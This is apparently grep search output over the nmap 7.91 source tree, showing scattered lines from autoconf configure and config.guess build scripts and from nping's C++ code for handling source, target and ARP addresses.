nmap-7.91+dfsg1/libdnet-stripped/configure-13172-      ;;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-13197-sys_lib_dlsearch_path_spec; do
nmap-7.91+dfsg1/libdnet-stripped/configure:13198:    case \`eval \\\\\$ECHO "X\\\\\$\$var"\` in
nmap-7.91+dfsg1/libdnet-stripped/configure-13199-    *[\\\\\\\`\\"\\\$]*)
nmap-7.91+dfsg1/libdnet-stripped/configure:13200:      eval "lt_\$var=\\\\\\"\\\`\\\$ECHO \\"X\\\$\$var\\" | \\\$Xsed -e \\"\\\$double_quote_subst\\" -e \\"\\\$sed_quote_subst\\" -e \\"\\\$delay_variable_subst\\"\\\`\\\\\\""
nmap-7.91+dfsg1/libdnet-stripped/configure-13201-      ;;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-13209-case \$lt_ECHO in
nmap-7.91+dfsg1/libdnet-stripped/configure:13210:*'\\\$0 --fallback-echo"')  lt_ECHO=\`\$ECHO "X\$lt_ECHO" | \$Xsed -e 's/\\\\\\\\\\\\\\\$0 --fallback-echo"\$/\$0 --fallback-echo"/'\`
nmap-7.91+dfsg1/libdnet-stripped/configure-13211-  ;;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-13306-fi
nmap-7.91+dfsg1/libdnet-stripped/configure:13307:ac_cs_awk_cr=`$AWK 'BEGIN { print "a\rb" }' </dev/null 2>/dev/null`
nmap-7.91+dfsg1/libdnet-stripped/configure-13308-if test "$ac_cs_awk_cr" = "a${ac_cr}b"; then
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-13323-  as_fn_error $? "could not make $CONFIG_STATUS" "$LINENO" 5
nmap-7.91+dfsg1/libdnet-stripped/configure:13324:ac_delim_num=`echo "$ac_subst_vars" | grep -c '^'`
nmap-7.91+dfsg1/libdnet-stripped/configure-13325-ac_delim='%!_!# '
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-13329-
nmap-7.91+dfsg1/libdnet-stripped/configure:13330:  ac_delim_n=`sed -n "s/.*$ac_delim\$/X/p" conf$$subs.awk | grep -c X`
nmap-7.91+dfsg1/libdnet-stripped/configure-13331-  if test $ac_delim_n = $ac_delim_num; then
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-13467-for ac_last_try in false false :; do
nmap-7.91+dfsg1/libdnet-stripped/configure:13468:  ac_tt=`sed -n "/$ac_delim/p" confdefs.h`
nmap-7.91+dfsg1/libdnet-stripped/configure-13469-  if test -z "$ac_tt"; then
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-13599-      esac
nmap-7.91+dfsg1/libdnet-stripped/configure:13600:      case $ac_f in *\'*) ac_f=`$as_echo "$ac_f" | sed "s/'/'\\\\\\\\''/g"`;; esac
nmap-7.91+dfsg1/libdnet-stripped/configure-13601-      as_fn_append ac_file_inputs " '$ac_f'"
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-13658-*)
nmap-7.91+dfsg1/libdnet-stripped/configure:13659:  ac_dir_suffix=/`$as_echo "$ac_dir" | sed 's|^\.[\\/]||'`
nmap-7.91+dfsg1/libdnet-stripped/configure-13660-  # A ".." for each directory in $ac_dir_suffix.
nmap-7.91+dfsg1/libdnet-stripped/configure:13661:  ac_top_builddir_sub=`$as_echo "$ac_dir_suffix" | sed 's|/[^\\/]*|/..|g;s|/||'`
nmap-7.91+dfsg1/libdnet-stripped/configure-13662-  case $ac_top_builddir_sub in
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-13719-/@mandir@/p'
nmap-7.91+dfsg1/libdnet-stripped/configure:13720:case `eval "sed -n \"\$ac_sed_dataroot\" $ac_file_inputs"` in
nmap-7.91+dfsg1/libdnet-stripped/configure-13721-*datarootdir*) ac_datarootdir_seen=yes;;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-13736-
nmap-7.91+dfsg1/libdnet-stripped/configure:13737:# Neutralize VPATH when `$srcdir' = `.'.
nmap-7.91+dfsg1/libdnet-stripped/configure-13738-# Shell code in configure.ac might set extrasub.
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-13764-test -z "$ac_datarootdir_hack$ac_datarootdir_seen" &&
nmap-7.91+dfsg1/libdnet-stripped/configure:13765:  { ac_out=`sed -n '/\${datarootdir}/p' "$ac_tmp/out"`; test -n "$ac_out"; } &&
nmap-7.91+dfsg1/libdnet-stripped/configure-13766-  { ac_out=`sed -n '/^[	 ]*datarootdir[	 ]*:*=/p' \
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-13810-    * )
nmap-7.91+dfsg1/libdnet-stripped/configure:13811:      _am_stamp_count=`expr $_am_stamp_count + 1` ;;
nmap-7.91+dfsg1/libdnet-stripped/configure-13812-  esac
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-13847-  # Strip MF so we end up with the name of the file.
nmap-7.91+dfsg1/libdnet-stripped/configure:13848:  mf=`echo "$mf" | sed -e 's/:.*$//'`
nmap-7.91+dfsg1/libdnet-stripped/configure-13849-  # Check whether this is an Automake generated Makefile or not.
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-13884-  # from the Makefile without running `make'.
nmap-7.91+dfsg1/libdnet-stripped/configure:13885:  DEPDIR=`sed -n 's/^DEPDIR = //p' < "$mf"`
nmap-7.91+dfsg1/libdnet-stripped/configure-13886-  test -z "$DEPDIR" && continue
nmap-7.91+dfsg1/libdnet-stripped/configure:13887:  am__include=`sed -n 's/^am__include = //p' < "$mf"`
nmap-7.91+dfsg1/libdnet-stripped/configure-13888-  test -z "am__include" && continue
nmap-7.91+dfsg1/libdnet-stripped/configure:13889:  am__quote=`sed -n 's/^am__quote = //p' < "$mf"`
nmap-7.91+dfsg1/libdnet-stripped/configure-13890-  # When using ansi2knr, U may be empty or an underscore; expand it
nmap-7.91+dfsg1/libdnet-stripped/configure:13891:  U=`sed -n 's/^U = //p' < "$mf"`
nmap-7.91+dfsg1/libdnet-stripped/configure-13892-  # Find all dependency output files, they are included files with
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-13944-
nmap-7.91+dfsg1/libdnet-stripped/configure:13945:# `$ECHO "$ofile" | sed 's%^.*/%%'` - Provide generalized library-building support services.
nmap-7.91+dfsg1/libdnet-stripped/configure-13946-# Generated automatically by $as_me ($PACKAGE$TIMESTAMP) $VERSION
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-14459-  # Extract subdirectory from the argument.
nmap-7.91+dfsg1/libdnet-stripped/configure:14460:  func_dirname_result=`$ECHO "X${1}" | $Xsed -e "$dirname"`
nmap-7.91+dfsg1/libdnet-stripped/configure-14461-  if test "X$func_dirname_result" = "X${1}"; then
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-14470-{
nmap-7.91+dfsg1/libdnet-stripped/configure:14471:  func_basename_result=`$ECHO "X${1}" | $Xsed -e "$basename"`
nmap-7.91+dfsg1/libdnet-stripped/configure-14472-}
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-14497-{
nmap-7.91+dfsg1/libdnet-stripped/configure:14498:  func_opt_split_opt=`$ECHO "X${1}" | $Xsed -e "$my_sed_long_opt"`
nmap-7.91+dfsg1/libdnet-stripped/configure:14499:  func_opt_split_arg=`$ECHO "X${1}" | $Xsed -e "$my_sed_long_arg"`
nmap-7.91+dfsg1/libdnet-stripped/configure-14500-}
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-14504-{
nmap-7.91+dfsg1/libdnet-stripped/configure:14505:  func_lo2o_result=`$ECHO "X${1}" | $Xsed -e "$lo2o"`
nmap-7.91+dfsg1/libdnet-stripped/configure-14506-}
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-14510-{
nmap-7.91+dfsg1/libdnet-stripped/configure:14511:  func_xform_result=`$ECHO "X${1}" | $Xsed -e 's/\.[^.]*$/.lo/'`
nmap-7.91+dfsg1/libdnet-stripped/configure-14512-}
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-14516-{
nmap-7.91+dfsg1/libdnet-stripped/configure:14517:  func_arith_result=`expr "$@"`
nmap-7.91+dfsg1/libdnet-stripped/configure-14518-}
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-14523-{
nmap-7.91+dfsg1/libdnet-stripped/configure:14524:  func_len_result=`expr "$1" : ".*" 2>/dev/null || echo $max_cmd_len`
nmap-7.91+dfsg1/libdnet-stripped/configure-14525-}
##############################################
nmap-7.91+dfsg1/nping/NpingOps.h-465-
nmap-7.91+dfsg1/nping/NpingOps.h:466:    struct sockaddr_storage *getSourceSockAddr();
nmap-7.91+dfsg1/nping/NpingOps.h:467:    struct sockaddr_storage *getSourceSockAddr(struct sockaddr_storage *ss);
nmap-7.91+dfsg1/nping/NpingOps.h-468-
##############################################
nmap-7.91+dfsg1/nping/NpingOps.h-589-
nmap-7.91+dfsg1/nping/NpingOps.h:590:    int setARPSenderHwAddr(u8 * val);
nmap-7.91+dfsg1/nping/NpingOps.h:591:    u8 * getARPSenderHwAddr();
nmap-7.91+dfsg1/nping/NpingOps.h:592:    bool issetARPSenderHwAddr();
nmap-7.91+dfsg1/nping/NpingOps.h-593-
nmap-7.91+dfsg1/nping/NpingOps.h:594:    int setARPTargetHwAddr(u8 * val);
nmap-7.91+dfsg1/nping/NpingOps.h:595:    u8 * getARPTargetHwAddr();
nmap-7.91+dfsg1/nping/NpingOps.h:596:    bool issetARPTargetHwAddr();
nmap-7.91+dfsg1/nping/NpingOps.h-597-
nmap-7.91+dfsg1/nping/NpingOps.h:598:    int setARPSenderProtoAddr(struct in_addr val);
nmap-7.91+dfsg1/nping/NpingOps.h:599:    struct in_addr getARPSenderProtoAddr();
nmap-7.91+dfsg1/nping/NpingOps.h:600:    bool issetARPSenderProtoAddr();
nmap-7.91+dfsg1/nping/NpingOps.h-601-
nmap-7.91+dfsg1/nping/NpingOps.h:602:    int setARPTargetProtoAddr(struct in_addr val);
nmap-7.91+dfsg1/nping/NpingOps.h:603:    struct in_addr getARPTargetProtoAddr();
nmap-7.91+dfsg1/nping/NpingOps.h:604:    bool issetARPTargetProtoAddr();
nmap-7.91+dfsg1/nping/NpingOps.h-605-
##############################################
nmap-7.91+dfsg1/nping/ArgParser.cc-614-        }else{
nmap-7.91+dfsg1/nping/ArgParser.cc:615:            o.setARPSenderHwAddr(auxmac);
nmap-7.91+dfsg1/nping/ArgParser.cc-616-        }
##############################################
nmap-7.91+dfsg1/nping/ArgParser.cc-622-        }else{
nmap-7.91+dfsg1/nping/ArgParser.cc:623:            o.setARPSenderProtoAddr(aux_ip4);
nmap-7.91+dfsg1/nping/ArgParser.cc-624-        }
##############################################
nmap-7.91+dfsg1/nping/ArgParser.cc-630-        }else{
nmap-7.91+dfsg1/nping/ArgParser.cc:631:            o.setARPTargetHwAddr(auxmac);
nmap-7.91+dfsg1/nping/ArgParser.cc-632-        }
##############################################
nmap-7.91+dfsg1/nping/ArgParser.cc-638-        }else{
nmap-7.91+dfsg1/nping/ArgParser.cc:639:            o.setARPTargetProtoAddr(aux_ip4);
nmap-7.91+dfsg1/nping/ArgParser.cc-640-        }
##############################################
nmap-7.91+dfsg1/nping/EchoClient.cc-168-  else
nmap-7.91+dfsg1/nping/EchoClient.cc:169:    target->getTargetSockAddr(&ss, &ss_len);
nmap-7.91+dfsg1/nping/EchoClient.cc-170-
##############################################
nmap-7.91+dfsg1/nping/EchoClient.cc-182-   /* Try to bind the IOD to the IP address supplied by the user */
nmap-7.91+dfsg1/nping/EchoClient.cc:183:   nsock_iod_set_localaddr(this->nsi, o.getSourceSockAddr(&src), sizeof(sockaddr_in6));
nmap-7.91+dfsg1/nping/EchoClient.cc-184-
##############################################
nmap-7.91+dfsg1/nping/EchoClient.cc-199-   /* Try to bind the IOD to the IP address supplied by the user */
nmap-7.91+dfsg1/nping/EchoClient.cc:200:   nsock_iod_set_localaddr(this->nsi, o.getSourceSockAddr(&src), sizeof(sockaddr_in));
nmap-7.91+dfsg1/nping/EchoClient.cc-201-
##############################################
nmap-7.91+dfsg1/nping/NpingTargets.cc-233-      NpingTarget *mytarget = new NpingTarget();
nmap-7.91+dfsg1/nping/NpingTargets.cc:234:      mytarget->setTargetSockAddr(&ss, slen);
nmap-7.91+dfsg1/nping/NpingTargets.cc-235-      if( buff[0]=='\0')
##############################################
nmap-7.91+dfsg1/nping/NpingTargets.cc-270-		  /* Source IP address that we should use when targeting this host */
nmap-7.91+dfsg1/nping/NpingTargets.cc:271:		  mytarget->setSourceSockAddr(&rnfo.srcaddr, sizeof(struct sockaddr_storage));
nmap-7.91+dfsg1/nping/NpingTargets.cc-272-
##############################################
nmap-7.91+dfsg1/nping/NpingTargets.cc-274-		  if( o.spoofSource() ){
nmap-7.91+dfsg1/nping/NpingTargets.cc:275:			mytarget->setSpoofedSourceSockAddr( o.getSourceSockAddr(), sizeof(struct sockaddr_storage));
nmap-7.91+dfsg1/nping/NpingTargets.cc-276-		  }
##############################################
nmap-7.91+dfsg1/nping/NpingTargets.cc-310-        s6->sin6_family=AF_INET6;        
nmap-7.91+dfsg1/nping/NpingTargets.cc:311:        mytarget->setSourceSockAddr(&ss, sizeof(struct sockaddr_storage));
nmap-7.91+dfsg1/nping/NpingTargets.cc-312-    }
##############################################
nmap-7.91+dfsg1/nping/NpingTargets.cc-370-  for(i=0; i<this->Targets.size(); i++){
nmap-7.91+dfsg1/nping/NpingTargets.cc:371:    this->Targets[i]->getTargetSockAddr(&ss, &ss_len);
nmap-7.91+dfsg1/nping/NpingTargets.cc-372-    /* Are we are dealing with IPv4 addresses? */
##############################################
nmap-7.91+dfsg1/nping/config.guess-34-
nmap-7.91+dfsg1/nping/config.guess:35:me=`echo "$0" | sed -e 's,.*/,,'`
nmap-7.91+dfsg1/nping/config.guess-36-
##############################################
nmap-7.91+dfsg1/nping/config.guess-102-: ${TMPDIR=/tmp} ;
nmap-7.91+dfsg1/nping/config.guess:103: { tmp=`(umask 077 && mktemp -d "$TMPDIR/cgXXXXXX") 2>/dev/null` && test -n "$tmp" && test -d "$tmp" ; } ||
nmap-7.91+dfsg1/nping/config.guess-104- { test -n "$RANDOM" && tmp=$TMPDIR/cg$$-$RANDOM && (umask 077 && mkdir $tmp) ; } ||
##############################################
nmap-7.91+dfsg1/nping/config.guess-151-	EOF
nmap-7.91+dfsg1/nping/config.guess:152:	eval `$CC_FOR_BUILD -E $dummy.c 2>/dev/null | grep '^LIBC' | sed 's, ,,g'`
nmap-7.91+dfsg1/nping/config.guess-153-	;;
##############################################
nmap-7.91+dfsg1/nping/config.guess-209-	    *)
nmap-7.91+dfsg1/nping/config.guess:210:		release=`echo ${UNAME_RELEASE}|sed -e 's/[-_].*/\./'`
nmap-7.91+dfsg1/nping/config.guess-211-		;;
##############################################
nmap-7.91+dfsg1/nping/config.guess-240-	*4.0)
nmap-7.91+dfsg1/nping/config.guess:241:		UNAME_RELEASE=`/usr/sbin/sizer -v | awk '{print $3}'`
nmap-7.91+dfsg1/nping/config.guess-242-		;;
nmap-7.91+dfsg1/nping/config.guess-243-	*5.*)
nmap-7.91+dfsg1/nping/config.guess:244:		UNAME_RELEASE=`/usr/sbin/sizer -v | awk '{print $4}'`
nmap-7.91+dfsg1/nping/config.guess-245-		;;
##############################################
nmap-7.91+dfsg1/nping/config.guess-250-	# types through head -n 1, so we only detect the type of CPU 0.
nmap-7.91+dfsg1/nping/config.guess:251:	ALPHA_CPU_TYPE=`/usr/sbin/psrinfo -v | sed -n -e 's/^  The alpha \(.*\) processor.*$/\1/p' | head -n 1`
nmap-7.91+dfsg1/nping/config.guess-252-	case "$ALPHA_CPU_TYPE" in
##############################################
nmap-7.91+dfsg1/nping/config.guess-288-	# 1.2 uses "1.2" for uname -r.
nmap-7.91+dfsg1/nping/config.guess:289:	echo ${UNAME_MACHINE}-dec-osf`echo ${UNAME_RELEASE} | sed -e 's/^[PVTX]//' | tr 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' 'abcdefghijklmnopqrstuvwxyz'`
nmap-7.91+dfsg1/nping/config.guess-290-	# Reset EXIT trap before exiting to avoid spurious non-zero exit code.
##############################################
nmap-7.91+dfsg1/nping/config.guess-348-    s390x:SunOS:*:*)
nmap-7.91+dfsg1/nping/config.guess:349:	echo ${UNAME_MACHINE}-ibm-solaris2`echo ${UNAME_RELEASE}|sed -e 's/[^.]*//'`
nmap-7.91+dfsg1/nping/config.guess-350-	exit ;;
nmap-7.91+dfsg1/nping/config.guess-351-    sun4H:SunOS:5.*:*)
nmap-7.91+dfsg1/nping/config.guess:352:	echo sparc-hal-solaris2`echo ${UNAME_RELEASE}|sed -e 's/[^.]*//'`
nmap-7.91+dfsg1/nping/config.guess-353-	exit ;;
nmap-7.91+dfsg1/nping/config.guess-354-    sun4*:SunOS:5.*:* | tadpole*:SunOS:5.*:*)
nmap-7.91+dfsg1/nping/config.guess:355:	echo sparc-sun-solaris2`echo ${UNAME_RELEASE}|sed -e 's/[^.]*//'`
nmap-7.91+dfsg1/nping/config.guess-356-	exit ;;
##############################################
nmap-7.91+dfsg1/nping/config.guess-373-	fi
nmap-7.91+dfsg1/nping/config.guess:374:	echo ${SUN_ARCH}-pc-solaris2`echo ${UNAME_RELEASE}|sed -e 's/[^.]*//'`
nmap-7.91+dfsg1/nping/config.guess-375-	exit ;;
##############################################
nmap-7.91+dfsg1/nping/config.guess-379-	# it's likely to be more like Solaris than SunOS4.
nmap-7.91+dfsg1/nping/config.guess:380:	echo sparc-sun-solaris3`echo ${UNAME_RELEASE}|sed -e 's/[^.]*//'`
nmap-7.91+dfsg1/nping/config.guess-381-	exit ;;
##############################################
nmap-7.91+dfsg1/nping/config.guess-388-	# Japanese Language versions have a version number like `4.1.3-JL'.
nmap-7.91+dfsg1/nping/config.guess:389:	echo sparc-sun-sunos`echo ${UNAME_RELEASE}|sed -e 's/-/_/'`
nmap-7.91+dfsg1/nping/config.guess-390-	exit ;;
##############################################
nmap-7.91+dfsg1/nping/config.guess-394-    sun*:*:4.2BSD:*)
nmap-7.91+dfsg1/nping/config.guess:395:	UNAME_RELEASE=`(sed 1q /etc/motd | awk '{print substr($5,1,3)}') 2>/dev/null`
nmap-7.91+dfsg1/nping/config.guess-396-	test "x${UNAME_RELEASE}" = "x" && UNAME_RELEASE=3
##############################################
nmap-7.91+dfsg1/nping/config.guess-476-	$CC_FOR_BUILD -o $dummy $dummy.c &&
nmap-7.91+dfsg1/nping/config.guess:477:	  dummyarg=`echo "${UNAME_RELEASE}" | sed -n 's/\([0-9]*\).*/\1/p'` &&
nmap-7.91+dfsg1/nping/config.guess:478:	  SYSTEM_NAME=`$dummy $dummyarg` &&
nmap-7.91+dfsg1/nping/config.guess-479-	    { echo "$SYSTEM_NAME"; exit; }
##############################################
nmap-7.91+dfsg1/nping/config.guess-532-    *:IRIX*:*:*)
nmap-7.91+dfsg1/nping/config.guess:533:	echo mips-sgi-irix`echo ${UNAME_RELEASE}|sed -e 's/-/_/g'`
nmap-7.91+dfsg1/nping/config.guess-534-	exit ;;
##############################################
nmap-7.91+dfsg1/nping/config.guess-562-EOF
nmap-7.91+dfsg1/nping/config.guess:563:		if $CC_FOR_BUILD -o $dummy $dummy.c && SYSTEM_NAME=`$dummy`
nmap-7.91+dfsg1/nping/config.guess-564-		then
##############################################
nmap-7.91+dfsg1/nping/config.guess-575-    *:AIX:*:[4567])
nmap-7.91+dfsg1/nping/config.guess:576:	IBM_CPU_ID=`/usr/sbin/lsdev -C -c processor -S available | sed 1q | awk '{ print $1 }'`
nmap-7.91+dfsg1/nping/config.guess-577-	if /usr/sbin/lsattr -El ${IBM_CPU_ID} | grep ' POWER' >/dev/null 2>&1; then
##############################################
nmap-7.91+dfsg1/nping/config.guess-611-    9000/[34678]??:HP-UX:*:*)
nmap-7.91+dfsg1/nping/config.guess:612:	HPUX_REV=`echo ${UNAME_RELEASE}|sed -e 's/[^.]*.[0B]*//'`
nmap-7.91+dfsg1/nping/config.guess-613-	case "${UNAME_MACHINE}" in
##############################################
nmap-7.91+dfsg1/nping/config.guess-665-EOF
nmap-7.91+dfsg1/nping/config.guess:666:		    (CCOPTS= $CC_FOR_BUILD -o $dummy $dummy.c 2>/dev/null) && HP_ARCH=`$dummy`
nmap-7.91+dfsg1/nping/config.guess-667-		    test -z "$HP_ARCH" && HP_ARCH=hppa
##############################################
nmap-7.91+dfsg1/nping/config.guess-693-    ia64:HP-UX:*:*)
nmap-7.91+dfsg1/nping/config.guess:694:	HPUX_REV=`echo ${UNAME_RELEASE}|sed -e 's/[^.]*.[0B]*//'`
nmap-7.91+dfsg1/nping/config.guess-695-	echo ia64-hp-hpux${HPUX_REV}
##############################################
nmap-7.91+dfsg1/nping/config.guess-723-EOF
nmap-7.91+dfsg1/nping/config.guess:724:	$CC_FOR_BUILD -o $dummy $dummy.c && SYSTEM_NAME=`$dummy` &&
nmap-7.91+dfsg1/nping/config.guess-725-		{ echo "$SYSTEM_NAME"; exit; }
##############################################
nmap-7.91+dfsg1/nping/config.guess-794-	FUJITSU_SYS=`uname -p | tr 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' 'abcdefghijklmnopqrstuvwxyz' | sed -e 's/\///'`
nmap-7.91+dfsg1/nping/config.guess:795:	FUJITSU_REL=`echo ${UNAME_RELEASE} | sed -e 's/ /_/'`
nmap-7.91+dfsg1/nping/config.guess-796-	echo "${FUJITSU_PROC}-fujitsu-${FUJITSU_SYS}${FUJITSU_REL}"
##############################################
nmap-7.91+dfsg1/nping/config.guess-799-	FUJITSU_SYS=`uname -p | tr 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' 'abcdefghijklmnopqrstuvwxyz' | sed -e 's/\///'`
nmap-7.91+dfsg1/nping/config.guess:800:	FUJITSU_REL=`echo ${UNAME_RELEASE} | tr 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' 'abcdefghijklmnopqrstuvwxyz' | sed -e 's/ /_/'`
nmap-7.91+dfsg1/nping/config.guess-801-	echo "sparc-fujitsu-${FUJITSU_SYS}${FUJITSU_REL}"
##############################################
nmap-7.91+dfsg1/nping/config.guess-815-	    amd64)
nmap-7.91+dfsg1/nping/config.guess:816:		echo x86_64-unknown-freebsd`echo ${UNAME_RELEASE}|sed -e 's/[-(].*//'` ;;
nmap-7.91+dfsg1/nping/config.guess-817-	    *)
nmap-7.91+dfsg1/nping/config.guess:818:		echo ${UNAME_PROCESSOR}-unknown-freebsd`echo ${UNAME_RELEASE}|sed -e 's/[-(].*//'` ;;
nmap-7.91+dfsg1/nping/config.guess-819-	esac
##############################################
nmap-7.91+dfsg1/nping/config.guess-873-    prep*:SunOS:5.*:*)
nmap-7.91+dfsg1/nping/config.guess:874:	echo powerpcle-unknown-solaris2`echo ${UNAME_RELEASE}|sed -e 's/[^.]*//'`
nmap-7.91+dfsg1/nping/config.guess-875-	exit ;;
##############################################
nmap-7.91+dfsg1/nping/config.guess-877-	# the GNU system
nmap-7.91+dfsg1/nping/config.guess:878:	echo `echo ${UNAME_MACHINE}|sed -e 's,[-/].*$,,'`-unknown-${LIBC}`echo ${UNAME_RELEASE}|sed -e 's,/.*$,,'`
nmap-7.91+dfsg1/nping/config.guess-879-	exit ;;
##############################################
nmap-7.91+dfsg1/nping/config.guess-881-	# other systems with GNU libc and userland
nmap-7.91+dfsg1/nping/config.guess:882:	echo ${UNAME_MACHINE}-unknown-`echo ${UNAME_SYSTEM} | sed 's,^[^/]*/,,' | tr '[A-Z]' '[a-z]'``echo ${UNAME_RELEASE}|sed -e 's/[-(].*//'`-${LIBC}
nmap-7.91+dfsg1/nping/config.guess-883-	exit ;;
##############################################
nmap-7.91+dfsg1/nping/config.guess-969-EOF
nmap-7.91+dfsg1/nping/config.guess:970:	eval `$CC_FOR_BUILD -E $dummy.c 2>/dev/null | grep '^CPU'`
nmap-7.91+dfsg1/nping/config.guess-971-	test x"${CPU}" != x && { echo "${CPU}-unknown-linux-${LIBC}"; exit; }
##############################################
nmap-7.91+dfsg1/nping/config.guess-1063-    i*86:*:4.*:* | i*86:SYSTEM_V:4.*:*)
nmap-7.91+dfsg1/nping/config.guess:1064:	UNAME_REL=`echo ${UNAME_RELEASE} | sed 's/\/MP$//'`
nmap-7.91+dfsg1/nping/config.guess-1065-	if grep Novell /usr/include/link.h >/dev/null 2>/dev/null; then
##############################################
nmap-7.91+dfsg1/nping/config.guess-1263-	fi
nmap-7.91+dfsg1/nping/config.guess:1264:	if test `echo "$UNAME_RELEASE" | sed -e 's/\..*//'` -le 10 ; then
nmap-7.91+dfsg1/nping/config.guess-1265-	    if [ "$CC_FOR_BUILD" != 'no_compiler_found' ]; then
##############################################
nmap-7.91+dfsg1/nping/config.guess-1348-    *:DragonFly:*:*)
nmap-7.91+dfsg1/nping/config.guess:1349:	echo ${UNAME_MACHINE}-unknown-dragonfly`echo ${UNAME_RELEASE}|sed -e 's/[-(].*//'`
nmap-7.91+dfsg1/nping/config.guess-1350-	exit ;;
##############################################
nmap-7.91+dfsg1/nping/config.guess-1361-    i*86:skyos:*:*)
nmap-7.91+dfsg1/nping/config.guess:1362:	echo ${UNAME_MACHINE}-pc-skyos`echo ${UNAME_RELEASE}` | sed -e 's/ .*$//'
nmap-7.91+dfsg1/nping/config.guess-1363-	exit ;;
##############################################
nmap-7.91+dfsg1/nping/NpingTargets.h-94-    int addSpec(char *spec);
nmap-7.91+dfsg1/nping/NpingTargets.h:95:    int getNextTargetSockAddr(struct sockaddr_storage *t, size_t *tlen);
nmap-7.91+dfsg1/nping/NpingTargets.h-96-    NpingTarget *getNextTarget();
##############################################
nmap-7.91+dfsg1/nping/configure.ac-64-  nping_gcc_major_version=0
nmap-7.91+dfsg1/nping/configure.ac:65:  case `$our_gcc --version | sed -e 's,\..*,.,' -e q` in
nmap-7.91+dfsg1/nping/configure.ac-66-    *4.)
##############################################
nmap-7.91+dfsg1/nping/NpingTarget.h-138-    /* Target IP address */
nmap-7.91+dfsg1/nping/NpingTarget.h:139:    int getTargetSockAddr(struct sockaddr_storage *ss, size_t *ss_len);
nmap-7.91+dfsg1/nping/NpingTarget.h:140:    int setTargetSockAddr(struct sockaddr_storage *ss, size_t ss_len);
nmap-7.91+dfsg1/nping/NpingTarget.h-141-    struct in_addr getIPv4Address();
##############################################
nmap-7.91+dfsg1/nping/NpingTarget.h-147-    /* Source address used to reach the target */
nmap-7.91+dfsg1/nping/NpingTarget.h:148:    int getSourceSockAddr(struct sockaddr_storage *ss, size_t *ss_len);
nmap-7.91+dfsg1/nping/NpingTarget.h:149:    int setSourceSockAddr(struct sockaddr_storage *ss, size_t ss_len);
nmap-7.91+dfsg1/nping/NpingTarget.h:150:    int getSpoofedSourceSockAddr(struct sockaddr_storage *ss, size_t *ss_len);
nmap-7.91+dfsg1/nping/NpingTarget.h:151:    int setSpoofedSourceSockAddr(struct sockaddr_storage *ss, size_t ss_len);
nmap-7.91+dfsg1/nping/NpingTarget.h-152-    bool spoofingSourceAddress();
##############################################
nmap-7.91+dfsg1/nping/NpingOps.cc-1369- * an returns an IPv4 sockaddr_in or an IPv6 sockaddr_in6 struct.  */
nmap-7.91+dfsg1/nping/NpingOps.cc:1370:struct sockaddr_storage *NpingOps::getSourceSockAddr(){
nmap-7.91+dfsg1/nping/NpingOps.cc-1371-  static struct sockaddr_storage ss;
nmap-7.91+dfsg1/nping/NpingOps.cc:1372:  return getSourceSockAddr(&ss);
nmap-7.91+dfsg1/nping/NpingOps.cc:1373:} /* End of getSourceSockAddr() */
nmap-7.91+dfsg1/nping/NpingOps.cc-1374-
##############################################
nmap-7.91+dfsg1/nping/NpingOps.cc-1379- * sockaddr_in6 struct.  */
nmap-7.91+dfsg1/nping/NpingOps.cc:1380:struct sockaddr_storage *NpingOps::getSourceSockAddr(struct sockaddr_storage *ss){
nmap-7.91+dfsg1/nping/NpingOps.cc-1381-  struct sockaddr_in *s4 = (struct sockaddr_in*)ss;
##############################################
nmap-7.91+dfsg1/nping/NpingOps.cc-1406-  }else{
nmap-7.91+dfsg1/nping/NpingOps.cc:1407:    nping_fatal(QT_3, "NpingOps::getSourceSockAddr(): IP version unset.");
nmap-7.91+dfsg1/nping/NpingOps.cc-1408-  }
nmap-7.91+dfsg1/nping/NpingOps.cc-1409-  return ss;
nmap-7.91+dfsg1/nping/NpingOps.cc:1410:} /* End of getSourceSockAddr() */
nmap-7.91+dfsg1/nping/NpingOps.cc-1411-
##############################################
nmap-7.91+dfsg1/nping/NpingOps.cc-2089- *  @return OP_SUCCESS on success and OP_FAILURE in case of error.           */
nmap-7.91+dfsg1/nping/NpingOps.cc:2090:int NpingOps::setARPSenderHwAddr(u8 * val){
nmap-7.91+dfsg1/nping/NpingOps.cc-2091-  memcpy(this->arp_sha, val, 6); /* MAC Address (6 bytes) */
##############################################
nmap-7.91+dfsg1/nping/NpingOps.cc-2093-  return OP_SUCCESS;
nmap-7.91+dfsg1/nping/NpingOps.cc:2094:} /* End of setARPSenderHwAddr() */
nmap-7.91+dfsg1/nping/NpingOps.cc-2095-
##############################################
nmap-7.91+dfsg1/nping/NpingOps.cc-2097-/** Returns value of attribute arp_sha */
nmap-7.91+dfsg1/nping/NpingOps.cc:2098:u8 * NpingOps::getARPSenderHwAddr(){
nmap-7.91+dfsg1/nping/NpingOps.cc-2099-  return this->arp_sha;
nmap-7.91+dfsg1/nping/NpingOps.cc:2100:} /* End of getARPSenderHwAddr() */
nmap-7.91+dfsg1/nping/NpingOps.cc-2101-
##############################################
nmap-7.91+dfsg1/nping/NpingOps.cc-2103-/* Returns true if option has been set */
nmap-7.91+dfsg1/nping/NpingOps.cc:2104:bool NpingOps::issetARPSenderHwAddr(){
nmap-7.91+dfsg1/nping/NpingOps.cc-2105-  return this->arp_sha_set;
